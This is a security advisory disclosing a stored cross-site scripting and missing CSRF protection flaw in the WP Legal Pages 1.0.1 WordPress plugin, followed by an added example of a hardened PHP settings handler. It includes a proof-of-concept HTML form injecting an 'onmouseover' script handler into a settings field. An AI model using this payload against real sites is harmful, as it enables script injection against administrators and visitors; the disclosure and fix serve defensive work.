Subject: Persistent Cross-Site Scripting (XSS) in WP Legal Pages 1.0.1
Date: Fri, 21 Aug 2015 12:07:32 +0200

Hello,

Plugin: WP Legal Pages 1.0.1 https://wordpress.org/plugins/wplegalpages/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store HTML/JS code in the plugin settings, and the settings form has no CSRF protection.

Method: POST
URL: http://localhost/wp-admin/admin.php?page=legal-pages
Vulnerable parameters: lp-domain-name, lp-business-name, lp-phone, lp-street, lp-city-state, lp-country, lp-email, lp-address, lp-niche

Example PHP callstack:
/wplegalpages/adminSetting.php:91

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=legal-pages">
<input type="text" name="lp-gsubmit" value='Save' />
<input type="text" name="lp-domain-name" value='" onmouseover=alert(1) />'>
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,
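
For comparison, a hardened settings handler for the same parameters, as an added example that is not part of the original advisory and is not the plugin's code. It assumes it runs inside WordPress admin; the `lp_demo_*` function names, the nonce action and field, and the `lp_demo_settings` option are hypothetical.

```php
<?php
// Hypothetical hardened handler: every lp_demo_* name and the
// 'lp_demo_settings' option are assumptions, not taken from the plugin.
const LP_DEMO_FIELDS = array(
    'lp-domain-name', 'lp-business-name', 'lp-phone', 'lp-street',
    'lp-city-state', 'lp-country', 'lp-email', 'lp-address', 'lp-niche',
);

function lp_demo_save_settings() {
    if ( ! isset( $_POST['lp-gsubmit'] ) ) {
        return;
    }
    // Check the capability before touching any input.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF check: dies unless the request carries a valid nonce for this action.
    check_admin_referer( 'lp_demo_save', 'lp_demo_nonce' );

    $clean = array();
    foreach ( LP_DEMO_FIELDS as $field ) {
        $raw = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        $raw = is_string( $raw ) ? $raw : '';
        // Input sanitizing strips tags, but it leaves quotes in place.
        $clean[ $field ] = ( 'lp-email' === $field )
            ? sanitize_email( $raw )
            : sanitize_text_field( $raw );
    }
    update_option( 'lp_demo_settings', $clean );
}
add_action( 'admin_init', 'lp_demo_save_settings' );

function lp_demo_render_form() {
    $saved = get_option( 'lp_demo_settings', array() );
    echo '<form method="post">';
    wp_nonce_field( 'lp_demo_save', 'lp_demo_nonce' );
    foreach ( LP_DEMO_FIELDS as $field ) {
        $value = isset( $saved[ $field ] ) ? $saved[ $field ] : '';
        // esc_attr() at output: a stored quote cannot close the value attribute.
        printf(
            '<label>%1$s <input type="text" name="%1$s" value="%2$s" /></label><br />',
            esc_attr( $field ),
            esc_attr( $value )
        );
    }
    echo '<input type="submit" name="lp-gsubmit" value="Save" /></form>';
}
```

The verification value above contains no opening tag, so tag stripping on input does not neutralize it; the `esc_attr()` call at output is what keeps it inside the attribute.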